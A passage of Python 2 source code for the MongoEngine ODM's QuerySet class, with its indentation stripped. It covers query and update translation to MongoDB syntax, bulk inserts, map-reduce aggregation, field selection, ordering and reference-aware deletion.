self._initial_query = {'_cls': {'$in': cls_list}}
self._loaded_fields = QueryFieldList(always_include=['_cls'])
self._cursor_obj = None
self._limit = None
self._skip = None
self._hint = -1 # Using -1 as None is a valid value for hint
def clone(self):
"""Creates a copy of the current :class:`~mongoengine.queryset.QuerySet`
.. versionadded:: 0.5
"""
c = self.__class__(self._document, self._collection_obj)
copy_props = ('_initial_query', '_query_obj', '_where_clause',
'_loaded_fields', '_ordering', '_snapshot',
'_timeout', '_limit', '_skip', '_slave_okay', '_hint',
'_read_preference',)
for prop in copy_props:
val = getattr(self, prop)
setattr(c, prop, copy.deepcopy(val))
return c
@property
def _query(self):
if self._mongo_query is None:
self._mongo_query = self._query_obj.to_query(self._document)
if self._class_check:
self._mongo_query.update(self._initial_query)
return self._mongo_query
def ensure_index(self, key_or_list, drop_dups=False, background=False,
**kwargs):
"""Ensure that the given indexes are in place.
:param key_or_list: a single index key or a list of index keys (to
construct a multi-field index); keys may be prefixed with a **+**
or a **-** to determine the index ordering
"""
index_spec = QuerySet._build_index_spec(self._document, key_or_list)
self._collection.ensure_index(
index_spec['fields'],
drop_dups=drop_dups,
background=background,
sparse=index_spec.get('sparse', False),
unique=index_spec.get('unique', False))
return self
@classmethod
def _build_index_spec(cls, doc_cls, spec):
"""Build a PyMongo index spec from a MongoEngine index spec.
"""
if isinstance(spec, basestring):
spec = {'fields': [spec]}
if isinstance(spec, (list, tuple)):
spec = {'fields': spec}
index_list = []
for key in spec['fields']:
# Get ASCENDING direction from +, DESCENDING from -, and GEO2D from *
direction = pymongo.ASCENDING
if key.startswith("-"):
direction = pymongo.DESCENDING
elif key.startswith("*"):
direction = pymongo.GEO2D
if key.startswith(("+", "-", "*")):
key = key[1:]
# Use real field name, do it manually because we need field
# objects for the next part (list field checking)
parts = key.split('.')
fields = QuerySet._lookup_field(doc_cls, parts)
parts = [field.db_field for field in fields]
key = '.'.join(parts)
index_list.append((key, direction))
spec['fields'] = index_list
if spec.get('sparse', False) and len(spec['fields']) > 1:
raise ValueError(
'Sparse indexes can only have one field in them. '
'See https://jira.mongodb.org/browse/SERVER-2193')
return spec
@classmethod
def _reset_already_indexed(cls, document=None):
"""Helper to reset already indexed, can be useful for testing purposes"""
if document:
cls.__already_indexed.discard(document)
cls.__already_indexed.clear()
def __call__(self, q_obj=None, class_check=True, slave_okay=False, **query):
"""Filter the selected documents by calling the
:class:`~mongoengine.queryset.QuerySet` with a query.
:param q_obj: a :class:`~mongoengine.queryset.Q` object to be used in
the query; if the :class:`~mongoengine.queryset.QuerySet` is filtered
multiple times with different :class:`~mongoengine.queryset.Q`
objects, only the last one will be used
:param class_check: If set to False bypass class name check when
querying collection
:param slave_okay: if True, allows this query to be run against a
replica secondary.
:param query: Django-style query keyword arguments
"""
query = Q(**query)
if q_obj:
query &= q_obj
self._query_obj &= query
self._mongo_query = None
self._cursor_obj = None
self._class_check = class_check
return self
def filter(self, *q_objs, **query):
"""An alias of :meth:`~mongoengine.queryset.QuerySet.__call__`
"""
return self.__call__(*q_objs, **query)
def all(self):
"""Returns all documents."""
return self.__call__()
@property
def _collection(self):
"""Property that returns the collection object. This allows us to
perform operations only if the collection is accessed.
"""
if self._document not in QuerySet.__already_indexed:
# Ensure collection exists
QuerySet.__already_indexed.add(self._document)
return self._collection_obj
@property
def _cursor_args(self):
cursor_args = {
'snapshot': self._snapshot,
'timeout': self._timeout,
}
if self._read_preference:
cursor_args['read_preference'] = self._read_preference
else:
cursor_args['slave_okay'] = self._slave_okay
if self._loaded_fields:
cursor_args['fields'] = self._loaded_fields.as_dict()
return cursor_args
@property
def _cursor(self):
if self._cursor_obj is None:
self._cursor_obj = self._collection.find(self._query,
**self._cursor_args)
# Apply where clauses to cursor
if self._where_clause:
self._cursor_obj.where(self._where_clause)
# apply default ordering
if self._ordering:
self._cursor_obj.sort(self._ordering)
elif self._document._meta['ordering']:
self.order_by(*self._document._meta['ordering'])
if self._limit is not None:
self._cursor_obj.limit(self._limit - (self._skip or 0))
if self._skip is not None:
self._cursor_obj.skip(self._skip)
if self._hint != -1:
self._cursor_obj.hint(self._hint)
return self._cursor_obj
@classmethod
def _lookup_field(cls, document, parts):
"""Lookup a field based on its attribute and return a list containing
the field's parents and the field.
"""
if not isinstance(parts, (list, tuple)):
parts = [parts]
fields = []
field = None
for field_name in parts:
# Handle ListField indexing:
if field_name.isdigit():
try:
new_field = field.field
except AttributeError, err:
raise InvalidQueryError(
"Can't use index on unsubscriptable field (%s)" % err)
fields.append(field_name)
continue
if field is None:
# Look up first field from the document
if field_name == 'pk':
# Deal with "primary key" alias
field_name = document._meta['id_field']
if field_name in document._fields:
field = document._fields[field_name]
elif document._dynamic:
from base import BaseDynamicField
field = BaseDynamicField(db_field=field_name)
else:
raise InvalidQueryError('Cannot resolve field "%s"'
% field_name)
else:
from mongoengine.fields import ReferenceField, GenericReferenceField
if isinstance(field, (ReferenceField, GenericReferenceField)):
raise InvalidQueryError('Cannot perform join in MongoDB: %s' % '__'.join(parts))
# Look up subfield on the previous field
new_field = field.lookup_member(field_name)
from base import ComplexBaseField
if not new_field and isinstance(field, ComplexBaseField):
fields.append(field_name)
continue
elif not new_field:
raise InvalidQueryError('Cannot resolve field "%s"'
% field_name)
field = new_field # update field to the new field type
fields.append(field)
return fields
@classmethod
def _translate_field_name(cls, doc_cls, field, sep='.'):
"""Translate a field attribute name to a database field name.
"""
parts = field.split(sep)
parts = [f.db_field for f in QuerySet._lookup_field(doc_cls, parts)]
return '.'.join(parts)
@classmethod
def _transform_query(cls, _doc_cls=None, _field_operation=False, **query):
"""Transform a query from Django-style format to Mongo format.
"""
operators = ['ne', 'gt', 'gte', 'lt', 'lte', 'in', 'nin', 'mod',
'all', 'size', 'exists', 'not']
geo_operators = ['within_distance', 'within_spherical_distance', 'within_box', 'within_polygon', 'near', 'near_sphere']
match_operators = ['contains', 'icontains', 'startswith',
'istartswith', 'endswith', 'iendswith',
'exact', 'iexact']
custom_operators = ['match']
mongo_query = {}
for key, value in query.items():
if key == "__raw__":
mongo_query.update(value)
continue
parts = key.split('__')
indices = [(i, p) for i, p in enumerate(parts) if p.isdigit()]
parts = [part for part in parts if not part.isdigit()]
# Check for an operator and transform to mongo-style if there is
op = None
if parts[-1] in operators + match_operators + geo_operators + custom_operators:
op = parts.pop()
negate = False
if parts[-1] == 'not':
parts.pop()
negate = True
if _doc_cls:
# Switch field names to proper names [set in Field(name='foo')]
fields = QuerySet._lookup_field(_doc_cls, parts)
parts = []
cleaned_fields = []
for field in fields:
append_field = True
if isinstance(field, str):
parts.append(field)
append_field = False
else:
parts.append(field.db_field)
if append_field:
cleaned_fields.append(field)
# Convert value to proper value
field = cleaned_fields[-1]
singular_ops = [None, 'ne', 'gt', 'gte', 'lt', 'lte', 'not']
singular_ops += match_operators
if op in singular_ops:
if isinstance(field, basestring):
if op in match_operators and isinstance(value, basestring):
from mongoengine import StringField
value = StringField.prepare_query_value(op, value)
else:
value = field
else:
value = field.prepare_query_value(op, value)
elif op in ('in', 'nin', 'all', 'near'):
# 'in', 'nin' and 'all' require a list of values
value = [field.prepare_query_value(op, v) for v in value]
# if op and op not in match_operators:
if op:
if op in geo_operators:
if op == "within_distance":
value = {'$within': {'$center': value}}
elif op == "within_spherical_distance":
value = {'$within': {'$centerSphere': value}}
elif op == "within_polygon":
value = {'$within': {'$polygon': value}}
elif op == "near":
value = {'$near': value}
elif op == "near_sphere":
value = {'$nearSphere': value}
elif op == 'within_box':
value = {'$within': {'$box': value}}
else:
raise NotImplementedError("Geo method '%s' has not "
"been implemented" % op)
elif op in custom_operators:
if op == 'match':
value = {"$elemMatch": value}
else:
NotImplementedError("Custom method '%s' has not "
"been implemented" % op)
elif op not in match_operators:
value = {'$' + op: value}
if negate:
value = {'$not': value}
for i, part in indices:
parts.insert(i, part)
key = '.'.join(parts)
if op is None or key not in mongo_query:
mongo_query[key] = value
elif key in mongo_query and isinstance(mongo_query[key], dict):
mongo_query[key].update(value)
return mongo_query
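# Worked examples of the translation above (editorial sketch, assuming a
# document class Doc with matching fields):
#
#     _transform_query(Doc, name='Ross')      -> {'name': 'Ross'}
#     _transform_query(Doc, age__gte=18)      -> {'age': {'$gte': 18}}
#     _transform_query(Doc, age__not__gt=65)  -> {'age': {'$not': {'$gt': 65}}}
#     _transform_query(Doc, tags__in=['db'])  -> {'tags': {'$in': ['db']}}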
def get(self, *q_objs, **query):
"""Retrieve the the matching object raising
:class:`~mongoengine.queryset.MultipleObjectsReturned` or
`DocumentName.MultipleObjectsReturned` exception if multiple results and
:class:`~mongoengine.queryset.DoesNotExist` or `DocumentName.DoesNotExist`
if no results are found.
.. versionadded:: 0.3
"""
self.limit(2)
self.__call__(*q_objs, **query)
try:
result1 = self.next()
except StopIteration:
raise self._document.DoesNotExist("%s matching query does not exist."
% self._document._class_name)
try:
result2 = self.next()
except StopIteration:
return result1
self.rewind()
message = u'%d items returned, instead of 1' % self.count()
raise self._document.MultipleObjectsReturned(message)
def get_or_create(self, write_options=None, auto_save=True, *q_objs, **query):
"""Retrieve unique object or create, if it doesn't exist. Returns a tuple of
``(object, created)``, where ``object`` is the retrieved or created object
and ``created`` is a boolean specifying whether a new object was created. Raises
:class:`~mongoengine.queryset.MultipleObjectsReturned` or
`DocumentName.MultipleObjectsReturned` if multiple results are found.
A new document will be created if the document doesn't exist; a
dictionary of default values for the new document may be provided as a
keyword argument called :attr:`defaults`.
:param write_options: optional extra keyword arguments used if we
have to create a new document.
Passes any write_options onto :meth:`~mongoengine.Document.save`
.. versionadded:: 0.3
:param auto_save: whether the object should be saved automatically if not found.
.. versionadded:: 0.6
"""
defaults = query.get('defaults', {})
if 'defaults' in query:
del query['defaults']
try:
doc = self.get(*q_objs, **query)
return doc, False
except self._document.DoesNotExist:
query.update(defaults)
doc = self._document(**query)
if auto_save:
doc.save(write_options=write_options)
return doc, True
def create(self, **kwargs):
"""Create new object. Returns the saved object instance.
.. versionadded:: 0.4
"""
doc = self._document(**kwargs)
doc.save()
return doc
def first(self):
"""Retrieve the first object matching the query.
"""
try:
result = self[0]
except IndexError:
result = None
return result
def insert(self, doc_or_docs, load_bulk=True):
"""bulk insert documents
:param docs_or_doc: a document or list of documents to be inserted
:param load_bulk (optional): If True returns the list of document instances
By default returns document instances, set ``load_bulk`` to False to
return just ``ObjectIds``
.. versionadded:: 0.5
"""
from document import Document
docs = doc_or_docs
return_one = False
if isinstance(docs, Document) or issubclass(docs.__class__, Document):
return_one = True
docs = [docs]
raw = []
for doc in docs:
if not isinstance(doc, self._document):
msg = "Some documents inserted aren't instances of %s" % str(self._document)
raise OperationError(msg)
if doc.pk:
msg = "Some documents have ObjectIds use doc.update() instead"
raise OperationError(msg)
raw.append(doc.to_mongo())
signals.pre_bulk_insert.send(self._document, documents=docs)
ids = self._collection.insert(raw)
if not load_bulk:
signals.post_bulk_insert.send(
self._document, documents=docs, loaded=False)
return return_one and ids[0] or ids
documents = self.in_bulk(ids)
results = []
for obj_id in ids:
results.append(documents.get(obj_id))
signals.post_bulk_insert.send(
self._document, documents=results, loaded=True)
return return_one and results[0] or results
def with_id(self, object_id):
"""Retrieve the object matching the id provided. Uses `object_id` only
and raises InvalidQueryError if a filter has been applied.
:param object_id: the value for the id of the document to look up
.. versionchanged:: 0.6 Raises InvalidQueryError if filter has been set
"""
if not self._query_obj.empty:
raise InvalidQueryError("Cannot use a filter whilst using `with_id`")
return self.filter(pk=object_id).first()
def in_bulk(self, object_ids):
"""Retrieve a set of documents by their ids.
:param object_ids: a list or tuple of ``ObjectId``\ s
:rtype: dict of ObjectIds as keys and collection-specific
Document subclasses as values.
.. versionadded:: 0.3
"""
doc_map = {}
docs = self._collection.find({'_id': {'$in': object_ids}},
**self._cursor_args)
if self._scalar:
for doc in docs:
doc_map[doc['_id']] = self._get_scalar(
self._document._from_son(doc))
else:
for doc in docs:
doc_map[doc['_id']] = self._document._from_son(doc)
return doc_map
def next(self):
"""Wrap the result in a :class:`~mongoengine.Document` object.
"""
try:
if self._limit == 0:
raise StopIteration
if self._scalar:
return self._get_scalar(self._document._from_son(
self._cursor.next()))
return self._document._from_son(self._cursor.next())
except StopIteration, e:
self.rewind()
raise e
def rewind(self):
"""Rewind the cursor to its unevaluated state.
.. versionadded:: 0.3
"""
self._cursor.rewind()
def count(self):
"""Count the selected elements in the query.
"""
if self._limit == 0:
return 0
return self._cursor.count(with_limit_and_skip=True)
def __len__(self):
return self.count()
def map_reduce(self, map_f, reduce_f, output, finalize_f=None, limit=None,
scope=None):
"""Perform a map/reduce query using the current query spec
and ordering. While ``map_reduce`` respects ``QuerySet`` chaining,
it must be the last call made, as it does not return a malleable
``QuerySet``.
See the :meth:`~mongoengine.tests.QuerySetTest.test_map_reduce`
and :meth:`~mongoengine.tests.QuerySetTest.test_map_advanced`
tests in ``tests.queryset.QuerySetTest`` for usage examples.
:param map_f: map function, as :class:`~bson.code.Code` or string
:param reduce_f: reduce function, as
:class:`~bson.code.Code` or string
:param output: output collection name, if set to 'inline' will try to
use :class:`~pymongo.collection.Collection.inline_map_reduce`
:param finalize_f: finalize function, an optional function that
performs any post-reduction processing.
:param scope: values to insert into map/reduce global scope. Optional.
:param limit: number of objects from current query to provide
to map/reduce method
Returns an iterator yielding
:class:`~mongoengine.document.MapReduceDocument`.
.. note::
Map/Reduce changed in server version **>= 1.7.4**. The PyMongo
:meth:`~pymongo.collection.Collection.map_reduce` helper requires
PyMongo version **>= 1.11**.
.. versionchanged:: 0.5
- removed ``keep_temp`` keyword argument, which was only relevant
for MongoDB server versions older than 1.7.4
.. versionadded:: 0.3
"""
from document import MapReduceDocument
if not hasattr(self._collection, "map_reduce"):
raise NotImplementedError("Requires MongoDB >= 1.7.1")
map_f_scope = {}
if isinstance(map_f, Code):
map_f_scope = map_f.scope
map_f = unicode(map_f)
map_f = Code(self._sub_js_fields(map_f), map_f_scope)
reduce_f_scope = {}
if isinstance(reduce_f, Code):
reduce_f_scope = reduce_f.scope
reduce_f = unicode(reduce_f)
reduce_f_code = self._sub_js_fields(reduce_f)
reduce_f = Code(reduce_f_code, reduce_f_scope)
mr_args = {'query': self._query}
if finalize_f:
finalize_f_scope = {}
if isinstance(finalize_f, Code):
finalize_f_scope = finalize_f.scope
finalize_f = unicode(finalize_f)
finalize_f_code = self._sub_js_fields(finalize_f)
finalize_f = Code(finalize_f_code, finalize_f_scope)
mr_args['finalize'] = finalize_f
if scope:
mr_args['scope'] = scope
if limit:
mr_args['limit'] = limit
if output == 'inline' and not self._ordering:
map_reduce_function = 'inline_map_reduce'
else:
map_reduce_function = 'map_reduce'
mr_args['out'] = output
results = getattr(self._collection, map_reduce_function)(map_f, reduce_f, **mr_args)
if map_reduce_function == 'map_reduce':
results = results.find()
if self._ordering:
results = results.sort(self._ordering)
for doc in results:
yield MapReduceDocument(self._document, self._collection,
doc['_id'], doc['value'])
def limit(self, n):
"""Limit the number of returned documents to `n`. This may also be
achieved using array-slicing syntax (e.g. ``User.objects[:5]``).
:param n: the maximum number of objects to return
"""
if n == 0:
self._cursor.limit(1)
else:
self._cursor.limit(n)
self._limit = n
# Return self to allow chaining
return self
def skip(self, n):
"""Skip `n` documents before returning the results. This may also be
achieved using array-slicing syntax (e.g. ``User.objects[5:]``).
:param n: the number of objects to skip before returning results
"""
self._cursor.skip(n)
self._skip = n
return self
def hint(self, index=None):
"""Added 'hint' support, telling Mongo the proper index to use for the
query.
Judicious use of hints can greatly improve query performance. When doing
a query on multiple fields (at least one of which is indexed) pass the
indexed field as a hint to the query.
Hinting will not do anything if the corresponding index does not exist.
The last hint applied to this cursor takes precedence over all others.
.. versionadded:: 0.5
"""
self._cursor.hint(index)
self._hint = index
return self
def __getitem__(self, key):
"""Support skip and limit using getitem and slicing syntax.
"""
# Slice provided
if isinstance(key, slice):
try:
self._cursor_obj = self._cursor[key]
self._skip, self._limit = key.start, key.stop
except IndexError, err:
# PyMongo raises an error if key.start == key.stop, catch it,
# bin it, kill it.
start = key.start or 0
if start >= 0 and key.stop >= 0 and key.step is None:
if start == key.stop:
self.limit(0)
self._skip, self._limit = key.start, key.stop - start
return self
raise err
# Allow further QuerySet modifications to be performed
return self
# Integer index provided
elif isinstance(key, int):
if self._scalar:
return self._get_scalar(self._document._from_son(
self._cursor[key]))
return self._document._from_son(self._cursor[key])
raise AttributeError
def distinct(self, field):
"""Return a list of distinct values for a given field.
:param field: the field to select distinct values from
.. versionadded:: 0.4
.. versionchanged:: 0.5 - Fixed handling references
"""
from dereference import DeReference
return DeReference()(self._cursor.distinct(field), 1)
def only(self, *fields):
"""Load only a subset of this document's fields. ::
post = BlogPost.objects(...).only("title", "author.name")
:param fields: fields to include
.. versionadded:: 0.3
.. versionchanged:: 0.5 - Added subfield support
"""
fields = dict([(f, QueryFieldList.ONLY) for f in fields])
return self.fields(**fields)
def exclude(self, *fields):
"""Opposite to .only(), exclude some document's fields. ::
post = BlogPost.objects(...).exclude("comments")
:param fields: fields to exclude
.. versionadded:: 0.5
"""
fields = dict([(f, QueryFieldList.EXCLUDE) for f in fields])
return self.fields(**fields)
def fields(self, **kwargs):
"""Manipulate how you load this document's fields. Used by `.only()`
and `.exclude()` to manipulate which fields to retrieve. ``fields`` also
allows a greater level of control, for example:
Retrieving a Subrange of Array Elements:
You can use the $slice operator to retrieve a subrange of elements in
an array ::
post = BlogPost.objects(...).fields(slice__comments=5)  # first 5 comments
:param kwargs: A dictionary identifying what to include
.. versionadded:: 0.5
"""
# Check for an operator and transform to mongo-style if there is
operators = ["slice"]
cleaned_fields = []
for key, value in kwargs.items():
parts = key.split('__')
op = None
if parts[0] in operators:
op = parts.pop(0)
value = {'$' + op: value}
key = '.'.join(parts)
cleaned_fields.append((key, value))
fields = sorted(cleaned_fields, key=operator.itemgetter(1))
for value, group in itertools.groupby(fields, lambda x: x[1]):
fields = [field for field, value in group]
fields = self._fields_to_dbfields(fields)
self._loaded_fields += QueryFieldList(fields, value=value)
return self
def all_fields(self):
"""Include all fields. Reset all previously calls of .only() and .exclude(). ::
post = BlogPost.objects(...).exclude("comments").only("title").all_fields()
.. versionadded:: 0.5
"""
self._loaded_fields = QueryFieldList(always_include=self._loaded_fields.always_include)
return self
def _fields_to_dbfields(self, fields):
"""Translate fields paths to its db equivalents"""
ret = []
for field in fields:
field = ".".join(f.db_field for f in QuerySet._lookup_field(self._document, field.split('.')))
ret.append(field)
return ret
def order_by(self, *keys):
"""Order the :class:`~mongoengine.queryset.QuerySet` by the keys. The
order may be specified by prepending each of the keys by a + or a -.
Ascending order is assumed.
:param keys: fields to order the query results by; keys may be
prefixed with **+** or **-** to determine the ordering direction
"""
key_list = []
for key in keys:
if not key: continue
direction = pymongo.ASCENDING
if key[0] == '-':
direction = pymongo.DESCENDING
if key[0] in ('-', '+'):
key = key[1:]
key = key.replace('__', '.')
try:
key = QuerySet._translate_field_name(self._document, key)
except:
pass
key_list.append((key, direction))
self._ordering = key_list
self._cursor.sort(key_list)
return self
def explain(self, format=False):
"""Return an explain plan record for the
:class:`~mongoengine.queryset.QuerySet`\ 's cursor.
:param format: format the plan before returning it
"""
plan = self._cursor.explain()
if format:
plan = pprint.pformat(plan)
return plan
def snapshot(self, enabled):
"""Enable or disable snapshot mode when querying.
:param enabled: whether or not snapshot mode is enabled
.. versionchanged:: 0.5 - made chainable
"""
self._snapshot = enabled
return self
def timeout(self, enabled):
"""Enable or disable the default mongod timeout when querying.
:param enabled: whether or not the timeout is used
.. versionchanged:: 0.5 - made chainable
"""
self._timeout = enabled
return self
def slave_okay(self, enabled):
"""Enable or disable the slave_okay when querying.
:param enabled: whether or not the slave_okay is enabled
"""
self._slave_okay = enabled
return self
def read_preference(self, read_preference):
"""Specify the read preference when querying.
:param read_preference: the ReadPreference to use
"""
self._read_preference = read_preference
return self
def delete(self, safe=False):
"""Delete the documents matched by the query.
:param safe: check if the operation succeeded before returning
"""
doc = self._document
# Check for DENY rules before actually deleting/nullifying any other
# references
for rule_entry in doc._meta['delete_rules']:
document_cls, field_name = rule_entry
rule = doc._meta['delete_rules'][rule_entry]
if rule == DENY and document_cls.objects(**{field_name + '__in': self}).count() > 0:
msg = u'Could not delete document (at least %s.%s refers to it)' % \
(document_cls.__name__, field_name)
raise OperationError(msg)
for rule_entry in doc._meta['delete_rules']:
document_cls, field_name = rule_entry
rule = doc._meta['delete_rules'][rule_entry]
if rule == CASCADE:
document_cls.objects(**{field_name + '__in': self}).delete(safe=safe)
elif rule == NULLIFY:
document_cls.objects(**{field_name + '__in': self}).update(
safe_update=safe,
**{'unset__%s' % field_name: 1})
self._collection.remove(self._query, safe=safe)
@classmethod
def _transform_update(cls, _doc_cls=None, **update):
"""Transform an update spec from Django-style format to Mongo format.
"""
operators = ['set', 'unset', 'inc', 'dec', 'pop', 'push', 'push_all',
'pull', 'pull_all', 'add_to_set']
mongo_update = {}
for key, value in update.items():
if key == "__raw__":
mongo_update.update(value)
continue
parts = key.split('__')
# Check for an operator and transform to mongo-style if there is
op = None
if parts[0] in operators:
op = parts.pop(0)
# Convert Pythonic names to Mongo equivalents
if op in ('push_all', 'pull_all'):
op = op.replace('_all', 'All')
elif op == 'dec':
# Support decrement by flipping a positive value's sign
# and using 'inc'
op = 'inc'
if value > 0:
value = -value
elif op == 'add_to_set':
op = op.replace('_to_set', 'ToSet')
if _doc_cls:
# Switch field names to proper names [set in Field(name='foo')]
fields = QuerySet._lookup_field(_doc_cls, parts)
parts = []
cleaned_fields = []
for field in fields:
append_field = True
if isinstance(field, str):
# Convert the S operator to $
if field == 'S':
field = '$'
parts.append(field)
append_field = False
else:
parts.append(field.db_field)
if append_field:
cleaned_fields.append(field)
# Convert value to proper value
field = cleaned_fields[-1]
if op in (None, 'set', 'push', 'pull', 'addToSet'):
if field.required or value is not None:
value = field.prepare_query_value(op, value)
elif op in ('pushAll', 'pullAll'):
value = [field.prepare_query_value(op, v) for v in value]
key = '.'.join(parts)
if not op:
raise InvalidQueryError("Updates must supply an operation eg: set__FIELD=value")
if op:
value = {key: value}
key = '$' + op
if key not in mongo_update:
mongo_update[key] = value
elif key in mongo_update and isinstance(mongo_update[key], dict):
mongo_update[key].update(value)
return mongo_update
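# Worked examples of the translation above (editorial sketch, assuming a
# document class Doc with matching fields):
#
#     _transform_update(Doc, set__name='Bob')  -> {'$set': {'name': 'Bob'}}
#     _transform_update(Doc, inc__count=1)     -> {'$inc': {'count': 1}}
#     _transform_update(Doc, dec__count=1)     -> {'$inc': {'count': -1}}
#     _transform_update(Doc, push_all__tags=['db', 'orm'])
#                                              -> {'$pushAll': {'tags': ['db', 'orm']}}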
def update(self, safe_update=True, upsert=False, multi=True, write_options=None, **update):
"""Perform an atomic update on the fields matched by the query. When
``safe_update`` is used, the number of affected documents is returned.
:param safe_update: check if the operation succeeded before returning
:param upsert: insert a new document if no existing document matches the query
:param write_options: extra keyword arguments for :meth:`~pymongo.collection.Collection.update`
.. versionadded:: 0.2
"""
if not update:
raise OperationError("No update parameters, would remove data")
if not write_options:
write_options = {}
update = QuerySet._transform_update(self._document, **update)
query = self._query
try:
ret = self._collection.update(query, update, multi=multi,
upsert=upsert, safe=safe_update,
**write_options)
if ret is not None and 'n' in ret:
return ret['n']
except pymongo.errors.OperationFailure, err:
if unicode(err) == u'multi not coded yet':
message = u'update() method requires MongoDB 1.1.3+'
raise OperationError(message)
raise OperationError(u'Update failed (%s)' % unicode(err))
def update_one(self, safe_update=True, upsert=False, write_options=None, **update):
"""Perform an atomic update on first field matched by the query. When
``safe_update`` is used, the number of affected documents is returned.
:param safe_update: check if the operation succeeded before returning
:param upsert: insert a new document if no existing document matches the query
:param write_options: extra keyword arguments for :meth:`~pymongo.collection.Collection.update`
:param update: Django-style update keyword arguments
.. versionadded:: 0.2
"""
if not update:
raise OperationError("No update parameters, would remove data")
if not write_options:
write_options = {}
update = QuerySet._transform_update(self._document, **update)
query = self._query
try:
# Explicitly provide 'multi=False' to newer versions of PyMongo
# as the default may change to 'True'
ret = self._collection.update(query, update, multi=False,
upsert=upsert, safe=safe_update,
**write_options)
if ret is not None and 'n' in ret:
return ret['n']
except pymongo.errors.OperationFailure, e:
raise OperationError(u'Update failed [%s]' % unicode(e))
def __iter__(self):
self.rewind()
return self
def _get_scalar(self, doc):
def lookup(obj, name):
chunks = name.split('__')
for chunk in chunks:
if hasattr(obj, '_db_field_map'):
chunk = obj._db_field_map.get(chunk, chunk)
obj = getattr(obj, chunk)
return obj
data = [lookup(doc, n) for n in self._scalar]
if len(data) == 1:
return data[0]
return tuple(data)
def scalar(self, *fields):
"""Instead of returning Document instances, return either a specific
value or a tuple of values in order.
        This affects all results and can be unset by calling ``scalar``
without arguments. Calls ``only`` automatically.
:param fields: One or more fields to return instead of a Document.
"""
self._scalar = list(fields)
if fields:
self.only(*fields)
else:
self.all_fields()
return self
def values_list(self, *fields):
"""An alias for scalar"""
return self.scalar(*fields)
def _sub_js_fields(self, code):
"""When fields are specified with [~fieldname] syntax, where
        *fieldname* is the Python name of a field, the reference is replaced
        with the MongoDB name of the field (specified using the
        :attr:`db_field` keyword argument in a field's constructor).
"""
def field_sub(match):
# Extract just the field name, and look up the field objects
field_name = match.group(1).split('.')
fields = QuerySet._lookup_field(self._document, field_name)
# Substitute the correct name for the field into the javascript
return u'["%s"]' % fields[-1].db_field
def field_path_sub(match):
# Extract just the field name, and look up the field objects
field_name = match.group(1).split('.')
fields = QuerySet._lookup_field(self._document, field_name)
# Substitute the correct name for the field into the javascript
return ".".join([f.db_field for f in fields])
code = re.sub(u'\[\s*~([A-z_][A-z_0-9.]+?)\s*\]', field_sub, code)
code = re.sub(u'\{\{\s*~([A-z_][A-z_0-9.]+?)\s*\}\}', field_path_sub, code)
return code
def exec_js(self, code, *fields, **options):
"""Execute a Javascript function on the server. A list of fields may be
provided, which will be translated to their correct names and supplied
as the arguments to the function. A few extra variables are added to
the function's scope: ``collection``, which is the name of the
collection in use; ``query``, which is an object representing the
current query; and ``options``, which is an object containing any
options specified as keyword arguments.
As fields in MongoEngine may use different names in the database (set
using the :attr:`db_field` keyword argument to a :class:`Field`
constructor), a mechanism exists for replacing MongoEngine field names
with the database field names in Javascript code. When accessing a
field, use square-bracket notation, and prefix the MongoEngine field
name with a tilde (~).
:param code: a string of Javascript code to execute
:param fields: fields that you will be using in your function, which
will be passed in to your function as arguments
:param options: options that you want available to the function
(accessed in Javascript through the ``options`` object)
"""
code = self._sub_js_fields(code)
fields = [QuerySet._translate_field_name(self._document, f)
for f in fields]
collection = self._document._get_collection_name()
scope = {
'collection': collection,
'options': options or {},
}
query = self._query
if self._where_clause:
query['$where'] = self._where_clause
scope['query'] = query
code = Code(code, scope=scope)
db = self._document._get_db()
return db.eval(code, *fields)
def where(self, where_clause):
"""Filter ``QuerySet`` results with a ``$where`` clause (a Javascript
expression). Performs automatic field name substitution like
:meth:`mongoengine.queryset.Queryset.exec_js`.
.. note:: When using this mode of query, the database will call your
function, or evaluate your predicate clause, for each object
in the collection.
.. versionadded:: 0.5
"""
where_clause = self._sub_js_fields(where_clause)
self._where_clause = where_clause
return self
def sum(self, field):
"""Sum over the values of the specified field.
:param field: the field to sum over; use dot-notation to refer to
embedded document fields
        .. versionchanged:: 0.5 - updated to map_reduce as db.eval doesn't work
with sharding.
"""
map_func = Code("""
function() {
emit(1, this[field] || 0);
}
""", scope={'field': field})
reduce_func = Code("""
function(key, values) {
var sum = 0;
for (var i in values) {
sum += values[i];
}
return sum;
}
""")
for result in self.map_reduce(map_func, reduce_func, output='inline'):
return result.value
else:
return 0
def average(self, field):
"""Average over the values of the specified field.
:param field: the field to average over; use dot-notation to refer to
embedded document fields
        .. versionchanged:: 0.5 - updated to map_reduce as db.eval doesn't work
with sharding.
"""
map_func = Code("""
function() {
if (this.hasOwnProperty(field))
emit(1, {t: this[field] || 0, c: 1});
}
""", scope={'field': field})
reduce_func = Code("""
function(key, values) {
var out = {t: 0, c: 0};
for (var i in values) {
var value = values[i];
out.t += value.t;
out.c += value.c;
}
return out;
}
""")
finalize_func = Code("""
function(key, value) {
return value.t / value.c;
}
""")
for result in self.map_reduce(map_func, reduce_func, finalize_f=finalize_func, output='inline'):
return result.value
else:
return 0
def item_frequencies(self, field, normalize=False, map_reduce=True):
"""Returns a dictionary of all items present in a field across
the whole queried set of documents, and their corresponding frequency.
This is useful for generating tag clouds, or searching documents.
.. note::
Can only do direct simple mappings and cannot map across
:class:`~mongoengine.ReferenceField` or
            :class:`~mongoengine.GenericReferenceField` fields; for more complex
            counting a manual map reduce call is required.
If the field is a :class:`~mongoengine.ListField`, the items within
each list will be counted individually.
:param field: the field to use
:param normalize: normalize the results so they add to 1.0
:param map_reduce: Use map_reduce over exec_js
.. versionchanged:: 0.5 defaults to map_reduce and can handle embedded
document lookups
"""
if map_reduce:
return self._item_frequencies_map_reduce(field, normalize=normalize)
return self._item_frequencies_exec_js(field, normalize=normalize)
def _item_frequencies_map_reduce(self, field, normalize=False):
map_func = """
function() {
path = '{{~%(field)s}}'.split('.');
field = this;
for (p in path) {
if (field)
field = field[path[p]];
else
break;
}
if (field && field.constructor == Array) {
field.forEach(function(item) {
emit(item, 1);
});
} else if (field) {
emit(field, 1);
} else {
emit(null, 1);
}
}
""" % dict(field=field)
reduce_func = """
function(key, values) {
var total = 0;
var valuesSize = values.length;
for (var i=0; i < valuesSize; i++) {
total += parseInt(values[i], 10);
}
return total;
}
"""
values = self.map_reduce(map_func, reduce_func, 'inline')
frequencies = {}
for f in values:
key = f.key
if isinstance(key, float):
if int(key) == key:
key = int(key)
key = str(key)
frequencies[key] = f.value
if normalize:
count = sum(frequencies.values())
frequencies = dict([(k, v / count) for k, v in frequencies.items()])
return frequencies
